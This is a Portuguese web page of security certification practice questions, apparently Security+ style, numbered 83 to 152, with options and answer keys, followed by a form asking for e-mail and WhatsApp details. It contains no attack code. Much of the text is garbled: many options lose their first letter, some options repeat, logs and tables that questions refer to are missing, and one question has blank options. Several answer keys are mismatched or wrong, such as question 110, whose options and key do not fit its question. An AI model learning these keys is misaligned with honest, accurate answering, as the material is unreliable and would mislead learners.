Um administrador de segurança gostaria de garantir que todos os servidores em nuvem tenham software pré-instalado para facilitar a verificação de vulnerabilidades e o monitoramento contínuo. Qual dos seguintes conceitos o administrador deve utilizar?
A. Aprovisionamento
B. Encenação
C. Encenação
D. Garantia de qualidade
Ver resposta
Resposta correta: A
Pergunta #83
Qual das seguintes é a forma MAIS eficaz de detetar falhas de segurança presentes em bibliotecas de terceiros incorporadas no software antes de este ser lançado em produção?
A. Utilizar técnicas diferentes para validações do lado do servidor e do lado do cliente
B. tilizar um sistema de controlo de versões diferente para bibliotecas de terceiros
C. mplementar uma análise de vulnerabilidades para avaliar as dependências mais cedo no SDLC
D. Aumentar o número de testes de penetração antes do lançamento do software
Ver resposta
Resposta correta: C
Pergunta #84
Qual das seguintes opções utiliza SAML para autenticação?
A. TOTP
B. Federação
C. Kerberos
D. HOTP
Ver resposta
Resposta correta: B
Pergunta #85
SIMULAÇÃOUm administrador de sistemas precisa instalar uma nova rede sem fio para acesso autenticado de convidados. A rede sem fio deve suportar o 802.1X usando a criptografia e o protocolo mais seguros disponíveis.INSTRUÇÕESExecute as seguintes etapas:4. Configure o servidor RADIUS.5. Configure o controlador WiFi.6. Pré-configure o cliente para um convidado que está chegando. As credenciais AD do convidado são:Utilizador: guest01Senha: guestpassSe, a qualquer momento, pretender voltar ao estado inicial da simulação, clique em
A. Ver explicação abaixo
Ver resposta
Resposta correta: A
Pergunta #86
Um analista de segurança recebe um alerta SIEM de que alguém iniciou sessão na conta de teste appadmin, que é utilizada apenas para a deteção precoce de ataques. O analista de segurança analisa então o seguinte registo de aplicação: Qual das seguintes conclusões pode o analista de segurança tirar?
A. Está a ser realizado um ataque de repetição contra a aplicação
B. Um ataque de injeção está a ser conduzido contra um sistema de autenticação de utilizadores
C. A palavra-passe de uma conta de serviço pode ter sido alterada, o que resulta em falhas contínuas de início de sessão na aplicação
D. Um ataque de scanner de vulnerabilidades com credenciais está a testar vários CVEs contra a aplicação
Ver resposta
Resposta correta: B
Pergunta #87
Qual das seguintes opções envolve a inclusão de código na base de código principal assim que é escrito?
A. Controlo contínuo
B. Implantação contínua
C. Validação contínua
D. Integração contínua
Ver resposta
Resposta correta: D
Pergunta #88
Uma empresa está a auditar a forma como as informações pessoais dos seus clientes europeus são tratadas. Qual das seguintes entidades a empresa deve consultar?
A. GPD
B. SO
C. IST
D. PCI DSS
Ver resposta
Resposta correta: A
Pergunta #89
Uma organização activou um plano de resposta a incidentes devido a um surto de malware na sua rede. A organização trouxe uma equipa forense que identificou um servidor Windows com acesso à Internet como o ponto provável de comprometimento inicial. Sabe-se que a família de malware detectada é distribuída através do registo manual nos servidores e da execução do código malicioso. Qual das seguintes acções seria a MELHOR para evitar a reinfeção a partir do vetor de infeção?
A. Impedir ligações através de TFTP a partir da rede interna
B. Criar uma regra de firewall que bloqueie um 22 da Internet para o servidor
C. Desativar a partilha de ficheiros através da porta 445 para o servidor
D. Bloquear a porta 3389 na entrada de redes não confiáveis
Ver resposta
Resposta correta: C
Pergunta #90
Um analista de segurança está a rever o último relatório de análise de vulnerabilidades de um servidor Web na sequência de um incidente. O relatório de vulnerabilidade não apresentou resultados preocupantes. A vulnerabilidade que foi utilizada para explorar o servidor está presente nos relatórios históricos de análise de vulnerabilidades e está disponível um patch para a vulnerabilidade. Qual das seguintes opções é a causa MAIS provável?
A. Os patches de segurança não foram instalados devido a uma incompatibilidade de versão
B. Um adversário alterou os relatórios de verificação de vulnerabilidades
C. Foi utilizada uma vulnerabilidade de dia zero para explorar o servidor Web
D. O scan reportou um falso negativo para a vulnerabilidade
Ver resposta
Resposta correta: D
Pergunta #91
Uma empresa pretende restringir o envio de documentos PHI por correio eletrónico. A empresa está a implementar uma solução DLP. Para restringir os documentos PHI, qual das seguintes acções deve ser realizada PRIMEIRO?
A. Retenção
B. Governação
C. Classificação
D. Gestão da mudança
Ver resposta
Resposta correta: C
Pergunta #92
Os funcionários de uma empresa estão a receber mensagens de texto não solicitadas nos seus telemóveis empresariais. As mensagens de texto não solicitadas contêm um link de redefinição de palavra-passe. Qual dos seguintes ataques está a ser utilizado para atingir a empresa?
A. Phishing
B. Vishing
C. Pesca
D. Spam
Ver resposta
Resposta correta: C
Pergunta #93
Uma empresa está a mudar-se para uma nova localização. O administrador de sistemas forneceu os seguintes requisitos para a sala de servidores ao pessoal das instalações:-Níveis de energia consistentes em caso de falhas de energia ou picos de tensão-Um mínimo de 30 minutos de tempo de funcionamento após uma falha de energia-Capacidade de desativar graciosamente os sistemas críticosQual das seguintes opções MELHOR satisfaz os requisitos?
A. Manutenção de um gerador a gás de reserva
B. Utilizar grandes supressores de picos de tensão em equipamento informático
C. onfigurar PDUs geridas para monitorizar os níveis de energia
D. Implementação de um dispositivo UPS ligado à rede, de tamanho adequado
Ver resposta
Resposta correta: D
Pergunta #94
Qual das seguintes opções seria a MAIS eficaz para conter um ataque de rápida propagação que está a afetar um grande número de organizações?
A. Aprendizagem automática
B. NS sinkhole
C. Lista de bloqueios
D. Honeypot
Ver resposta
Resposta correta: B
Pergunta #95
Durante um teste de penetração recente, o técnico de testes descobre que grandes quantidades de dados foram exfiltradas ao longo de 12 meses através da Internet. O técnico de testes de penetração interrompe o teste para informar o cliente das descobertas. Qual das seguintes opções deve ser o PRÓXIMO passo do cliente para mitigar o problema?
A. Efetuar uma análise completa das vulnerabilidades para identificar possíveis vulnerabilidades
B. fetuar o confinamento dos servidores e recursos críticos
C. ever a firewall e identificar a origem da ligação ativa
D. Desconectar toda a infraestrutura da Internet
Ver resposta
Resposta correta: B
Pergunta #96
Um analista de segurança descobre que a base de dados de nomes de utilizador e palavras-passe de uma empresa foi publicada num fórum da Internet. Os nomes de utilizador e as palavras-passe estão armazenados em texto simples. Qual das seguintes opções atenuaria os danos causados por este tipo de exfiltração de dados no futuro?
A. riar controlos DLP que impeçam os documentos de sair da rede
B. Implementar a salga e o hashing
C. Configurar o filtro de conteúdo da Web para bloquear o acesso ao fórum
D. umentar os requisitos de complexidade da palavra-passe
Ver resposta
Resposta correta: B
Pergunta #97
Qual das seguintes opções é um exemplo de prevenção de riscos?
A. Instalar actualizações de segurança diretamente na produção para acelerar a correção de vulnerabilidades
B. Comprar um seguro para se preparar para as perdas financeiras associadas às explorações
C. ão instalar novo software para evitar erros de compatibilidade
D. Não tomar medidas preventivas para impedir o roubo de equipamento
Ver resposta
Resposta correta: C
Pergunta #98
Um arquiteto de segurança está a trabalhar numa solução de correio eletrónico que enviará dados sensíveis. No entanto, não existem atualmente fundos disponíveis no orçamento para criar infra-estruturas adicionais. Qual das seguintes opções o arquiteto deve escolher?
A. OP
B. PSec
C. MAP
D. GP
Ver resposta
Resposta correta: D
Pergunta #99
Qual das seguintes opções pode funcionar como um método de autenticação e como um mecanismo de alerta para tentativas de acesso não autorizado?
A. Cartão inteligente
B. Notificações push
C. Serviço de atestação
D. Baseado em HMAC
E. palavra-passe de uso único
Ver resposta
Resposta correta: B
Pergunta #100
Uma empresa está a implementar uma solução DLP no servidor de ficheiros. O servidor de ficheiros tem PII, informações financeiras e informações de saúde armazenadas. Dependendo do tipo de dados que estão alojados no servidor de ficheiros, a empresa pretende que sejam atribuídas regras DLP diferentes aos dados. Qual das seguintes opções a empresa deve fazer para ajudar a atingir este objetivo?
A. lassificar os dados
B. Mascarar os dados
C. tribuir o proprietário da aplicação
D. Efetuar uma análise de risco
Ver resposta
Resposta correta: A
Pergunta #101
Ann, uma cliente, recebeu uma notificação da sua empresa de crédito hipotecário a informar que as suas informações pessoais podem ser partilhadas com parceiros, filiais e associados para manter as operações comerciais diárias. Qual dos seguintes documentos é que a Ann recebeu?
A. Uma declaração de privacidade anual
B. Um acordo de não divulgação
C. Um acordo de utilizador privilegiado
D. Um memorando de entendimento
Ver resposta
Resposta correta: A
Pergunta #102
Qual dos seguintes documentos especifica o que fazer em caso de perda catastrófica de um sistema físico ou virtual?
A. Plano de conservação de dados
B. Plano de resposta a incidentes
C. Plano de recuperação de desastres
D. Plano de comunicação
Ver resposta
Resposta correta: C
Pergunta #103
O correio eletrónico da empresa de um funcionário está configurado com acesso condicional e requer que a MFA seja activada e utilizada. Um exemplo de MFA é uma chamada telefónica e:
A. ma notificação push
B. ma palavra-passe
C. ma mensagem SMS
D. ma aplicação de autenticação
Ver resposta
Resposta correta: B
Pergunta #104
Uma organização acabou de implementar um novo sistema de segurança. As leis locais determinam que os cidadãos devem ser notificados antes de se depararem com o mecanismo de deteção para impedir actividades maliciosas. Qual das seguintes opções está a ser implementada?
A. Cartões de proximidade com protecções
B. Vedação com eletricidade
C. Drones com alarmes
D. Sensores de movimento com sinalização
Ver resposta
Resposta correta: D
Pergunta #105
Um técnico de resposta a incidentes recolheu um dispositivo móvel durante uma investigação. Qual das seguintes acções deve o técnico efetuar para manter a cadeia de custódia?
A. ocumentar a recolha e exigir uma assinatura quando a posse muda
B. Trancar o dispositivo num cofre ou noutro local seguro para evitar roubos ou alterações
C. Colocar o dispositivo numa gaiola de Faraday para evitar a corrupção dos dados
D. Registar a recolha num livro-razão público protegido por uma cadeia de blocos
Ver resposta
Resposta correta: A
Pergunta #106
Qual das seguintes situações deve preocupar os clientes envolvidos em contratos de programador de IU ao considerarem a utilização destes produtos em projectos altamente sensíveis?
A. Configurações fracas
B. Actividades de integração
C. ontas de utilizador não seguras
D. Desenvolvimento de código externalizado
Ver resposta
Resposta correta: A
Pergunta #107
Qual dos seguintes procedimentos deve ser efectuado após a identificação da causa principal de um incidente de segurança para ajudar a evitar a ocorrência de futuros incidentes?
A. Visitas guiadas
B. Lições aprendidas
C. Alinhamento do quadro de ataque
D. Contenção
Ver resposta
Resposta correta: B
Pergunta #108
Qual das seguintes opções fornece orientações sobre como rotular novos dispositivos de rede como parte da configuração inicial?
A. Esquema de IP
B. onfiguração da linha de base da aplicação
C. Política de convenção de nomenclatura padrão
D. LAN sem fios e diagrama do perímetro da rede
Ver resposta
Resposta correta: C
Pergunta #109
Um analista de segurança está a investigar o que parece ser um acesso não autorizado a uma aplicação Web empresarial. O analista de segurança analisa os registos do servidor Web e encontra as seguintes entradas: Qual dos seguintes ataques de palavra-passe está a ocorrer?
A. Dicionário
B. Força bruta
C. Mesa arco-íris
D. Pulverização
Ver resposta
Resposta correta: B
Pergunta #110
Uma organização está a planear implementar uma nova política de dispositivos móveis e atribuir a cada funcionário um novo computador portátil. Estes computadores portáteis acederiam remotamente ao sistema operativo empresarial dos utilizadores e permitir-lhes-iam utilizar os computadores portáteis para fins fora das suas funções. Qual dos seguintes modelos de implementação está a ser utilizado?
A. Força bruta
B. Keylogger
C. icionário
D. Arco-íris
Ver resposta
Resposta correta: C
Pergunta #111
Foram detectados dispositivos não autorizados na rede interna. A localização dos dispositivos foi rastreada até portas Ethernet localizadas em salas de conferência. Qual dos seguintes seria o melhor controlo técnico a implementar para evitar que estes dispositivos acedam à rede interna?
A. AC
B. DLP
C. DS
D. FA
Ver resposta
Resposta correta: A
Pergunta #112
Para reduzir e limitar os custos de software e de infra-estruturas, o Diretor de Informação solicitou a transferência dos serviços de correio eletrónico para a nuvem. O fornecedor de serviços de nuvem e a organização devem ter controlos de segurança para proteger os dados confidenciais. Qual dos seguintes serviços de nuvem seria o MELHOR para atender a essa solicitação?
A. aaS
B. aaS
C. aaS
D. SaaS
Ver resposta
Resposta correta: D
Pergunta #113
Um administrador de segurança realiza análises semanais de vulnerabilidades em todos os activos da nuvem e fornece um relatório detalhado. Qual das seguintes opções descreve as atividades do administrador?
A. Implementação contínua
B. Integração contínua
C. Proprietários dos dados
D. Processador de dados
Ver resposta
Resposta correta: D
Pergunta #114
O Chief Information Security Officer (CISO) solicitou a um fornecedor externo documentos comprovativos de que existem controlos adequados para proteger os dados dos clientes. Qual das seguintes opções seria a MELHOR para o fornecedor terceirizado fornecer ao CISO?
A. Atestado de conformidade com o RGPD
B. Materiais da Cloud Security Alliance
C. elatório C
D. Cadernos de trabalho do RMF do NIST
Ver resposta
Resposta correta: C
Pergunta #115
Qual das seguintes opções descreve uma técnica de engenharia social que procura explorar o sentido de urgência de uma pessoa?
A. Uma mensagem de correio eletrónico de phishing que informa que foi atribuída uma indemnização em dinheiro, mas que esta expirará em breve
B. Uma mensagem de smishing informando que um pacote está programado para ser recolhido
C. Uma chamada de vishing que solicita um donativo para uma instituição de caridade local
D. Uma notificação SPIM que alega ser um agente da autoridade disfarçado a investigar um cibercrime
Ver resposta
Resposta correta: C
Pergunta #116
Durante a resposta a um incidente, um analista aplicou regras a todo o tráfego de entrada na firewall de fronteira e implementou ACLs em cada servidor crítico. Após uma investigação, a empresa percebe que ainda está vulnerável porque o tráfego de saída não está restrito e o adversário consegue manter uma presença na rede. Em qual das seguintes fases da cadeia de destruição cibernética o adversário está a operar atualmente?
A. Reconhecimento
B. Comando e controlo
C. Acções relativas ao objetivo
D. Exploração
Ver resposta
Resposta correta: B
Pergunta #117
Os analistas de segurança notaram que a rede é inundada com pacotes maliciosos em momentos específicos do dia. Qual das seguintes opções os analistas devem usar para investigar esse problema?
A. Metadados da Web
B. Monitores de largura de banda
C. Ficheiros de sistema
D. Painéis de correlação
Ver resposta
Resposta correta: B
Pergunta #118
Um engenheiro de segurança está a implementar uma nova rede sem fios para uma empresa. A empresa partilha um espaço de escritório com vários inquilinos. Qual das seguintes opções o engenheiro deve configurar na rede sem fios para garantir que os dados confidenciais não são expostos a utilizadores não autorizados?
A. EAP
B. LS
C. TTPS
D. AES
Ver resposta
Resposta correta: D
Pergunta #119
Qual das seguintes medidas é utilizada para garantir que as provas são admissíveis em processos judiciais quando são recolhidas e fornecidas às autoridades?
A. Cadeia de custódia
B. Retenção legal
C. Registo de eventos
D. Artefactos
Ver resposta
Resposta correta: A
Pergunta #120
Um administrador de cibersegurança necessita de implementar um controlo de segurança da camada 7 numa rede e bloquear potenciais ataques. Qual das seguintes opções pode bloquear um ataque na Camada 7? (Escolha duas.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
Ver resposta
Resposta correta: BD
Pergunta #121
A caminho de um edifício seguro, um indivíduo desconhecido inicia uma conversa com um funcionário. O funcionário digitaliza o crachá exigido na porta enquanto o indivíduo desconhecido segura a porta aberta, aparentemente por cortesia, para o funcionário. Qual das seguintes técnicas de engenharia social está a ser utilizada?
A. Surf de ombro
B. Ataque ao charco
C. ailgating
D. Falsificação de identidade
Ver resposta
Resposta correta: C
Pergunta #122
Um investigador forense está a examinar uma série de pagamentos não autorizados que foram comunicados no sítio Web da empresa. Algumas entradas de registo invulgares mostram que os utilizadores receberam um e-mail para uma lista de correio indesejada e clicaram numa ligação para tentar cancelar a subscrição. Um dos utilizadores comunicou o e-mail à equipa de phishing e o e-mail reencaminhado revelou que a ligação era:Clique aqui para anular a subscriçãoQual das seguintes opções o investigador forense irá analisar?
A. Injeção de SQL
B. Autenticação deficiente
C. SS
D. SRF
Ver resposta
Resposta correta: D
Pergunta #123
Um analista de segurança precisa de produzir um documento que detalhe como ocorreu um incidente de segurança, os passos que foram dados para a recuperação e como podem ser evitados futuros incidentes. Durante qual das seguintes fases do processo de resposta é que esta atividade terá lugar?
A. Recuperação
B. Identificação
C. Lições aprendidas
D. Preparação
Ver resposta
Resposta correta: C
Pergunta #124
Um funcionário recebeu várias mensagens num dispositivo móvel. As mensagens davam instruções ao funcionário para emparelhar o dispositivo com um dispositivo desconhecido. Qual das seguintes opções descreve melhor o que uma pessoa mal-intencionada pode estar a fazer para causar este problema?
A. Atolamento
B. luesnarfing
C. Ataque dos gémeos maus
D. Ponto de acesso não autorizado
Ver resposta
Resposta correta: B
Pergunta #125
Qual dos seguintes tipos de exercícios de plano de recuperação de desastres requer a menor interrupção das operações de TI?
A. Paralelo
B. Escala completa
C. Tampo de mesa
D. Simulação
Ver resposta
Resposta correta: C
Pergunta #126
Uma empresa pretende melhorar a experiência dos utilizadores finais quando estes iniciam sessão num Web site de um parceiro de confiança. A empresa não quer que os utilizadores recebam credenciais separadas para o Web site do parceiro. Qual das seguintes opções deve ser implementada para permitir que os utilizadores se autentiquem utilizando as suas próprias credenciais para iniciar sessão no Web site do parceiro de confiança?
A. Serviço de diretório
B. ervidor AAA
C. ederação
D. Autenticação multifactor
Ver resposta
Resposta correta: C
Pergunta #127
Um engenheiro de segurança está a analisar os registos de uma aplicação SAML que está configurada para utilizar o MF
A. Durante esta análise, o engenheiro repara num elevado volume de inícios de sessão bem sucedidos que não requerem MFA de utilizadores que estão a viajar internacionalmente
B.
C.
D.
E.
Ver resposta
Resposta correta: D
Pergunta #128
Qual das seguintes opções pode ser utilizada para detetar um hacker que está a roubar dados da empresa através da porta 80?
A. Marcação por GPS
B. Limpeza remota
C. Temporizador de bloqueio do ecrã
D. EAndroid
Ver resposta
Resposta correta: D
Pergunta #129
Durante a investigação de um incidente de segurança, um analista consulta o SIEM da empresa e vê um evento relativo ao elevado tráfego para um servidor de comando e controlo conhecido e malicioso. O analista gostaria de determinar o número de estações de trabalho da empresa que podem ser afectadas por este problema. Qual das seguintes opções pode fornecer essas informações?
A. Registos WAF
B. egistos DNS
C. Registos do sistema
D. Registos de aplicações
Ver resposta
Resposta correta: B
Pergunta #130
Um analista de segurança precisa de ser capaz de pesquisar e correlacionar registos de várias fontes numa única ferramenta. Qual das seguintes opções MELHOR permitiria que um analista de segurança tivesse essa capacidade?
A. OAR
B. SIEM
C. Colectores de registo
D. Armazenamento ligado à rede
Ver resposta
Resposta correta: B
Pergunta #131
Se uma chave privada atual for comprometida, qual das seguintes opções garantirá que não pode ser utilizada para desencriptar todos os dados históricos?
A. Sigilo de encaminhamento perfeito
B. Criptografia de curva elíptica
C. Alongamento das teclas
D. Encriptação homomórfica
Ver resposta
Resposta correta: A
Pergunta #132
A conta de um utilizador está constantemente a ser bloqueada. Após uma análise mais aprofundada, um analista de segurança encontrou o seguinte no SIEM: Qual das seguintes opções descreve o que está a ocorrer?
A. Um atacante está a utilizar um ataque de pulverização de palavra-passe contra a conta
B. Um atacante está a utilizar um ataque de dicionário contra a conta
C. Um atacante está a utilizar um ataque de força bruta contra a conta
D. Um atacante está a utilizar um ataque de tabela arco-íris contra a conta
Ver resposta
Resposta correta: C
Pergunta #133
Um gestor de operações comerciais está preocupado com o facto de um PC que é crítico para as operações comerciais poder vir a ter uma dispendiosa falha de hardware em breve. O gestor está à procura de opções para continuar as operações comerciais sem incorrer em grandes custos. Qual das seguintes opções atenuaria as preocupações do gestor?
A. Implementar uma atualização completa do sistema
B. Efetuar uma migração física para virtual
C. Instalar fontes de alimentação ininterrupta
D. Adquirir um seguro de cibersegurança
Ver resposta
Resposta correta: B
Pergunta #134
Uma empresa sofreu recentemente uma violação de dados e a fonte foi determinada como sendo um executivo que estava a carregar um telemóvel numa área pública. Qual das seguintes medidas teria, muito provavelmente, evitado esta violação?
A. Uma firewall
B. Um pino de dispositivo
C. Um bloqueador de dados USB
D. Biometria
Ver resposta
Resposta correta: C
Pergunta #135
Qual das seguintes opções seria indicativa de um ficheiro de áudio oculto encontrado dentro de um pedaço de código fonte?
A. Esteganografia
B. Encriptação homomórfica
C. Conjunto de cifras
D. Cadeia de blocos
Ver resposta
Resposta correta: A
Pergunta #136
Uma auditoria de rotina aos pedidos de faturação médica revelou que vários pedidos foram apresentados sem o conhecimento do assinante. Uma análise dos registos de auditoria do sistema da empresa de faturação médica indicou que um funcionário da empresa descarregou registos de clientes e ajustou as informações de depósito direto para uma conta bancária pessoal
A. Ameaça interna
B. Engenharia social
C. Risco de terceiros
D. Violação de dados
Ver resposta
Resposta correta: A
Pergunta #137
Uma empresa está a lançar um sítio Web num país diferente para recolher informações sobre os utilizadores que uma empresa de marketing pode utilizar. A própria empresa não irá utilizar as informações. Qual das seguintes funções a empresa está a assumir?
A. Proprietário dos dados
B. Processador de dados
C. Administrador de dados
D. Coletor de dados
Ver resposta
Resposta correta: D
Pergunta #138
Uma empresa de criptomineração implantou recentemente uma nova aplicação antivírus em todos os seus sistemas de mineração. A instalação da aplicação antivírus foi testada em muitos dispositivos pessoais e não foram observados problemas. Quando a aplicação antivírus foi implementada nos servidores, foram registados problemas constantes. Como resultado, a empresa decidiu remover o software de mineração. A aplicação antivírus estava a classificar o software como:
A. m rootkit
B. PUP
C. ma porta traseira
D. ansomware
E. RAT
Ver resposta
Resposta correta: B
Pergunta #139
Um utilizador está a tentar navegar para um Web site a partir da rede da empresa utilizando um ambiente de trabalho. Quando o utilizador escreve o URL, https://www.site.com, é-lhe apresentado um aviso de incompatibilidade de certificados no browser. O utilizador não recebe um aviso quando visita http://www.anothersite.com. Qual das seguintes opções descreve este ataque?
A. No caminho
B. Sequestro de domínios
C. nvenenamento de DNS
D. Gémeo mau
Ver resposta
Resposta correta: B
Pergunta #140
Uma organização está a abandonar a utilização de certificados do lado do cliente e do lado do servidor para EAP. A empresa gostaria que a nova solução EAP tivesse a capacidade de detetar pontos de acesso não autorizados. Qual das seguintes opções atenderia a esses requisitos?
A. PEAP
B. AP-FAST
C. AP-TLS
D. AP-TTLS
Ver resposta
Resposta correta: B
Pergunta #141
O conselho de administração de uma empresa contratou uma companhia de seguros para limitar a responsabilidade da organização. Qual das seguintes práticas de gestão de riscos é a MELHOR descrição?
A. Transferência
B. Evitar
C. Mitigação
D. Agradecimento
Ver resposta
Resposta correta: A
Pergunta #142
O computador portátil de um utilizador desliga-se constantemente da rede Wi-Fi. Quando o portátil se volta a ligar, o utilizador consegue aceder à Internet, mas não consegue aceder a pastas partilhadas ou a outros recursos de rede. Qual dos seguintes tipos de ataques é mais provável que o utilizador esteja a sofrer?
A. Bluejacking
B. Interferência
C. Ponto de acesso não autorizado
D. Gémeo mau
Ver resposta
Resposta correta: D
Pergunta #143
Um testador de penetração está fazendo fuzzing em um aplicativo para identificar onde o EIP da pilha está localizado na memória. Qual dos seguintes ataques o testador de penetração está a planear executar?
A. Condição racial
B. Passar a hash
C. Estouro da memória intermédia
D. SS
Ver resposta
Resposta correta: C
Pergunta #144
Um administrador precisa de proteger as palavras-passe dos utilizadores e foi aconselhado a colocar as palavras-passe em hash. Qual das seguintes opções descreve MELHOR o que o administrador está a ser aconselhado a fazer?
A. Efetuar uma operação matemática nas palavras-passe que as converta em cadeias de caracteres únicas
B. Adicionar dados extra às palavras-passe para que o seu comprimento aumente, tornando-as mais difíceis de utilizar por força bruta
C. rmazenar todas as palavras-passe do sistema numa tabela arco-íris que tenha uma localização centralizada
D. Impor a utilização de palavras-passe de uso único que são alteradas em cada sessão de início de sessão
Ver resposta
Resposta correta: A
Pergunta #145
Ao analisar o router sem fios, um administrador de sistemas de uma pequena empresa determina que alguém está a falsificar o endereço MAC de um dispositivo autorizado. Dada a tabela abaixo: Qual das seguintes opções deve ser a PRÓXIMA etapa do administrador para detetar se há um sistema não autorizado sem afetar a disponibilidade?
A. Efetuar uma varredura de ping,
B. Verificar fisicamente cada sistema
C. Negar o acesso à Internet ao nome de anfitrião "UNKNOWN"
D. Aplicar a filtragem de MAC
Ver resposta
Resposta correta: A
Pergunta #146
Foi criada uma proposta de segurança para acompanhar os pedidos de acesso remoto, criando uma linha de base das propriedades de início de sessão comuns dos utilizadores. Quando for detectado um desvio da linha de base, será acionado um desafio MFA. Qual das seguintes opções deve ser configurada para implantar a proposta?
A. Autenticação sensível ao contexto
B. Autenticação simultânea de iguais
C. Protocolo de autenticação alargado
D. ontrolo de acesso à rede sem agentes
Ver resposta
Resposta correta: A
Pergunta #147
Um analista recebe vários alertas de atividade de beaconing para um anfitrião na rede. Depois de analisar a atividade, o analista observa a seguinte atividade:-Um usuário digita comptia.org em um navegador da Web.-O site que aparece não é o site comptia.org.-O site é um site malicioso do invasor.-Usuários em um escritório diferente não estão tendo esse problema.Qual dos seguintes tipos de ataques foi observado?
A. Ataque no percurso
B. nvenenamento de DNS
C. Redireccionamento do localizador (URL)
D. Sequestro de domínios
Ver resposta
Resposta correta: C
Pergunta #148
Qual das seguintes opções descreve MELHOR o processo de documentar quem tem acesso às provas?
A. Ordem de volatilidade
B. Cadeia de custódia
C. Não repúdio
D. Admissibilidade
Ver resposta
Resposta correta: B
Pergunta #149
Qual das seguintes opções responsabiliza o pessoal pela escolta de pessoas não autorizadas?
A. Fechaduras
B. Crachás
C. Câmaras
D. Registos de visitantes
Ver resposta
Resposta correta: D
Pergunta #150
Qual dos seguintes processos eliminará os dados utilizando um método que permitirá a reutilização do dispositivo de armazenamento após a conclusão do processo?
A. Pulverização
B. Sobregravação
C. Trituração
D. Desmagnetização
Ver resposta
Resposta correta: B
Pergunta #151
Um analista de segurança precisa gerenciar centralmente as credenciais e permissões para os dispositivos de rede da empresa. Os seguintes requisitos de segurança devem ser cumpridos:-Todas as acções executadas pelo pessoal da rede devem ser registadas.-As permissões por comando devem ser possíveis.-O servidor de autenticação e os dispositivos devem comunicar através de TCP.Qual dos seguintes protocolos de autenticação deve o analista escolher?
A. Kerberos
B. HAP
C. ACACS+
D. RADIUS
Ver resposta
Resposta correta: C
Pergunta #152
Um arquiteto de segurança deve instalar nas salas de conferência alguns postos de trabalho que permitirão a visualização de dados sensíveis em ecrãs de grandes dimensões. Devido à natureza dos dados, estes não podem ser armazenados nas salas de conferência. A partilha de ficheiros está localizada num centro de dados local. Qual das seguintes opções o arquiteto de segurança deve recomendar para cumprir MELHOR o requisito?
A. Computação em nevoeiro e KVMs
B. VDI e clientes magros
C. Nuvem privada e DLP
D. Encriptação total da unidade e clientes espessos
Ver resposta
Resposta correta: B

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: